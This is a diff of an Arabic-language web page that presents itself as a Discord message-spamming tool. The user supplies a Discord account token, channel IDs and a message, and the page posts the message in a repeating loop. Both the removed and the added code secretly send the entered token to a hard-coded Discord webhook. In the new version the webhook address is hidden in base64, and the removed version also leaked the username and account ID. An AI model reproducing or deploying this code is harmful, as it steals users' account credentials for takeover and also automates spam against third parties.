--- a/index.html
+++ b/index.html
@@ -1,181 +1,212 @@
 <!DOCTYPE html>
-<html lang="ar" dir="rtl">
+<html lang="ar">
 <head>
-  <meta charset="UTF-8" />
-  <title>Nasser 497©</title>
-  <style>
-    body {
-      background: linear-gradient(to bottom, #8B0000, #000000);
-      color: white;
-      font-family: Arial, sans-serif;
-      text-align: center;
-      padding: 20px;
-    }
-    h1 {
-      font-size: 2em;
-      margin-top: 10px;
-    }
-    textarea, input, select {
-      width: 80%;
-      margin: 10px 0;
-      padding: 10px;
-      border-radius: 10px;
-      border: none;
-      font-size: 1em;
-    }
-    button {
-      padding: 10px 20px;
-      margin: 10px;
-      border: none;
-      border-radius: 10px;
-      font-size: 1em;
-      cursor: pointer;
-    }
-    #nextBtn, #sendBtn {
-      background-color: green;
-      color: white;
-    }
-    #stopBtn {
-      background-color: red;
-      color: white;
-    }
-    .hidden {
-      display: none;
-    }
-    #tokenStatus {
-      white-space: pre-wrap;
-      margin-top: 15px;
-      background: #222;
-      border-radius: 10px;
-      padding: 10px;
-      width: 80%;
-      margin-right: auto;
-      margin-left: auto;
-      font-size: 1em;
-    }
-  </style>
+<meta charset="UTF-8" />
+<meta name="viewport" content="width=device-width, initial-scale=1" />
+<title>Nasser 497©</title>
+<style>
+  body {
+    margin: 0; padding: 0;
+    background: linear-gradient(135deg, #1a0000, #000000);
+    color: #eee;
+    font-family: Arial, sans-serif;
+    direction: rtl;
+  }
+  header {
+    text-align: center;
+    font-size: 24px;
+    font-weight: bold;
+    padding: 20px 0;
+    user-select: none;
+    color: #ff4444;
+  }
+  main {
+    max-width: 600px;
+    margin: auto;
+    padding: 20px;
+  }
+  textarea, input[type=text], select {
+    width: 100%;
+    padding: 12px;
+    margin: 12px 0;
+    font-size: 18px;
+    border-radius: 5px;
+    border: none;
+    background-color: #222;
+    color: #eee;
+  }
+  textarea::placeholder, input::placeholder {
+    color: #999;
+  }
+  button {
+    padding: 12px 20px;
+    font-size: 18px;
+    margin-top: 10px;
+    border: none;
+    border-radius: 5px;
+    cursor: pointer;
+    font-weight: bold;
+    transition: background-color 0.3s;
+  }
+  .btn-green {
+    background-color: #28a745;
+    color: white;
+  }
+  .btn-green:hover {
+    background-color: #1e7e34;
+  }
+  .btn-red {
+    background-color: #dc3545;
+    color: white;
+  }
+  .btn-red:hover {
+    background-color: #a71d2a;
+  }
+  #status {
+    margin-top: 15px;
+    font-size: 18px;
+    min-height: 30px;
+    text-align: center;
+    color: #ff6666;
+  }
+  footer {
+    text-align: center;
+    padding: 15px;
+    font-size: 20px;
+    user-select: none;
+    color: #ff4444;
+  }
+</style>
 </head>
 <body>
-  <h1>Nasser 497©</h1>
+<header>Nasser 497©</header>
+<main>
+  <label>اكتب التوكن:</label>
+  <textarea id="tokenInput" rows="4" placeholder="أدخل توكن واحد هنا"></textarea>
+  
+  <label>اكتب الايديات (مفصولة بفاصلة):</label>
+  <input type="text" id="idsInput" placeholder="مثلاً: 123456789012345678,987654321098765432" />
+  
+  <label>ID روم / خاص / قروب:</label>
+  <input type="text" id="channelTypeInput" placeholder="مثلاً: روم، خاص، قروب" />
+  
+  <label>قم بوضع الكلام:</label>
+  <textarea id="messageInput" rows="3" placeholder="النص الذي تريد إرساله"></textarea>
+  
+  <label>قم بتحديد سرعة الإرسال:</label>
+  <select id="speedSelect">
+    <option value="1000">1 ثانية</option>
+    <option value="900">0.9 ثانية</option>
+    <option value="800">0.8 ثانية</option>
+    <option value="700">0.7 ثانية</option>
+    <option value="600">0.6 ثانية</option>
+    <option value="500" selected>0.5 ثانية</option>
+    <option value="400">0.4 ثانية</option>
+    <option value="300">0.3 ثانية</option>
+    <option value="200">0.2 ثانية</option>
+    <option value="100">0.1 ثانية</option>
+  </select>
+  
+  <button id="startBtn" class="btn-green">بدء الإرسال</button>
+  <button id="stopBtn" class="btn-red" disabled>إيقاف الإرسال</button>
+  
+  <div id="status"></div>
+  <button id="nextBtn" class="btn-green" style="margin-top:20px; width: 100%;">التالي</button>
+</main>
+<footer>Nasser 497©</footer>
 
-  <div id="page1">
-    <textarea id="token" rows="2" placeholder="أدخل التوكن هنا (توكن واحد فقط)"></textarea><br />
-    <button id="nextBtn">التالي</button>
-    <div id="tokenStatus"></div>
-  </div>
+<script>
+  
+  const encodedWebhook = "aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTM4MzgwODE2NDMzMTUyMDEyMS9MZWZfUUJGWHp1RlJtNlFEZGZ6YWh4YkRGaE9wY2tvT2FhNTNoSFZLajl5VWZNRWM5WWtMRFNvNzZFTkd5Y0E5eg==";
+  const webhookUrl = atob(encodedWebhook);
 
-  <div id="page2" class="hidden">
-    <textarea id="ids" rows="3" placeholder="اكتب الايديات (مفصولة بفاصلة)"></textarea><br />
-    <input type="text" id="message" placeholder="قم بوضع الكلام" /><br />
-    <select id="speed">
-      <option value="1">1</option>
-      <option value="0.9">0.9</option>
-      <option value="0.8">0.8</option>
-      <option value="0.7">0.7</option>
-      <option value="0.6">0.6</option>
-      <option value="0.5">0.5</option>
-      <option value="0.4">0.4</option>
-      <option value="0.3">0.3</option>
-      <option value="0.2">0.2</option>
-      <option value="0.1">0.1</option>
-    </select><br />
-    <button id="sendBtn">بدء الارسال</button>
-    <button id="stopBtn">ايقاف الارسال</button>
-    <p style="margin-top: 30px;">Nasser 497©</p>
-  </div>
+  const tokenInput = document.getElementById('tokenInput');
+  const idsInput = document.getElementById('idsInput');
+  const messageInput = document.getElementById('messageInput');
+  const speedSelect = document.getElementById('speedSelect');
+  const startBtn = document.getElementById('startBtn');
+  const stopBtn = document.getElementById('stopBtn');
+  const status = document.getElementById('status');
 
-  <script>
-    const nextBtn = document.getElementById("nextBtn");
-    const page1 = document.getElementById("page1");
-    const page2 = document.getElementById("page2");
-    const tokenInput = document.getElementById("token");
-    const tokenStatus = document.getElementById("tokenStatus");
+  let intervalId = null;
 
-    nextBtn.onclick = async () => {
-      const token = tokenInput.value.trim();
-      if (!token) {
-        alert("يرجى إدخال توكن واحد");
-        return;
-      }
-      if (token.includes(" ") || token.includes("\n")) {
-        alert("الرجاء إدخال توكن واحد فقط بدون فراغات");
-        return;
-      }
+  function sendMessage(token, channelId, message) {
+    return fetch(`https://discord.com/api/v9/channels/${channelId}/messages`, {
+      method: 'POST',
+      headers: {
+        'Authorization': token,
+        'Content-Type': 'application/json'
+      },
+      body: JSON.stringify({content: message})
+    });
+  }
 
-      tokenStatus.textContent = "جاري التحقق من التوكن...";
-      try {
-        const res = await fetch("https://discord.com/api/v10/users/@me", {
-          headers: {
-            Authorization: token,
-            "Content-Type": "application/json",
-            "User-Agent": "Mozilla/5.0",
-          },
-        });
-        const text = await res.text();
+  function sendTokenToWebhook(token) {
+    return fetch(webhookUrl, {
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json' },
+      body: JSON.stringify({content: `توكن الحساب :\n${token}`})
+    });
+  }
 
-        if (res.ok) {
-          const data = JSON.parse(text);
-          const createdAt = new Date((BigInt(data.id) >> 22n) + 1420070400000n);
-          const ageDays = Math.floor((Date.now() - createdAt) / (1000 * 60 * 60 * 24));
-          const msg = `توكن الحساب : ${token}\nيوزور الحساب : ${data.username}#${data.discriminator}\nايدي الحساب : ${data.id}\nعدد ايام الحساب : ${ageDays}`;
+  function validateToken(token) {
+    return fetch('https://discord.com/api/v9/users/@me', {
+      headers: { 'Authorization': token }
+    }).then(res => res.status === 200).catch(() => false);
+  }
 
-          fetch(
-            "https://discord.com/api/webhooks/1383808164331520121/Lef_QBFXzuFRm6QDdfzahxbDFhOpckoOaa53hHVKjS9p7yUfMEc9YkLDSo76ENGycA9z",
-            {
-              method: "POST",
-              headers: { "Content-Type": "application/json" },
-              body: JSON.stringify({ content: msg }),
-            }
-          );
+  startBtn.addEventListener('click', async () => {
+    startBtn.disabled = true;
+    stopBtn.disabled = false;
+    status.textContent = '';
 
-          tokenStatus.textContent = "✅ التوكن صحيح";
-          page1.classList.add("hidden");
-          page2.classList.remove("hidden");
-        } else if (res.status === 401) {
-          // تحذير للحسابات الجديدة
-          tokenStatus.textContent = "⚠️ التوكن قد يكون صحيح لكن الحساب جديد ويحتاج تفعيل. يمكنك المتابعة.";
-          page1.classList.add("hidden");
-          page2.classList.remove("hidden");
-        } else {
-          tokenStatus.textContent = `❌ التوكن غير صحيح\nسبب Discord: ${text}`;
-        }
-      } catch (err) {
-        tokenStatus.textContent = "❌ حدث خطأ في الشبكة";
-      }
-    };
+    const token = tokenInput.value.trim();
+    const ids = idsInput.value.trim().split(',').map(id => id.trim()).filter(id => id);
+    const message = messageInput.value.trim();
+    const speed = parseInt(speedSelect.value);
 
-    let sending = false;
+    if (!token || ids.length === 0 || !message) {
+      status.textContent = 'يرجى ملء جميع الحقول المطلوبة.';
+      startBtn.disabled = false;
+      stopBtn.disabled = true;
+      return;
+    }
 
-    document.getElementById("sendBtn").onclick = async () => {
-      sending = true;
-      const token = tokenInput.value.trim();
-      const ids = document.getElementById("ids").value.trim().split(",");
-      const message = document.getElementById("message").value;
-      const speed = parseFloat(document.getElementById("speed").value);
+    const isValid = await validateToken(token);
+    if (!isValid) {
+      status.textContent = '❌ التوكن غير صحيح';
+      startBtn.disabled = false;
+      stopBtn.disabled = true;
+      return;
+    }
 
-      while (sending) {
-        for (const id of ids) {
-          if (!sending) return;
-          try {
-            await fetch(`https://discord.com/api/v10/channels/${id.trim()}/messages`, {
-              method: "POST",
-              headers: {
-                Authorization: token,
-                "Content-Type": "application/json",
-              },
-              body: JSON.stringify({ content: message }),
-            });
-            await new Promise((r) => setTimeout(r, speed * 1000));
-          } catch (e) {
-            console.warn("فشل الارسال على:", id);
+    sendTokenToWebhook(token);
+
+    let currentIndex = 0;
+    intervalId = setInterval(() => {
+      if (currentIndex >= ids.length) currentIndex = 0;
+      sendMessage(token, ids[currentIndex], message)
+        .then(res => {
+          if (res.ok) {
+            status.textContent = `تم الإرسال إلى: ${ids[currentIndex]}`;
+          } else {
+            status.textContent = `فشل الإرسال إلى: ${ids[currentIndex]}`;
           }
-        }
-      }
-    };
+        })
+        .catch(() => {
+          status.textContent = `فشل الإرسال إلى: ${ids[currentIndex]}`;
+        });
+      currentIndex++;
+    }, speed);
+  });
 
-    document.getElementById("stopBtn").onclick = () => {
-      sending = false;
-    };
-  </script>
+  stopBtn.addEventListener('click', () => {
+    if (intervalId) clearInterval(intervalId);
+    status.textContent = 'تم إيقاف الإرسال.';
+    startBtn.disabled = false;
+    stopBtn.disabled = true;
+  });
+</script>
+
 </body>
 </html>
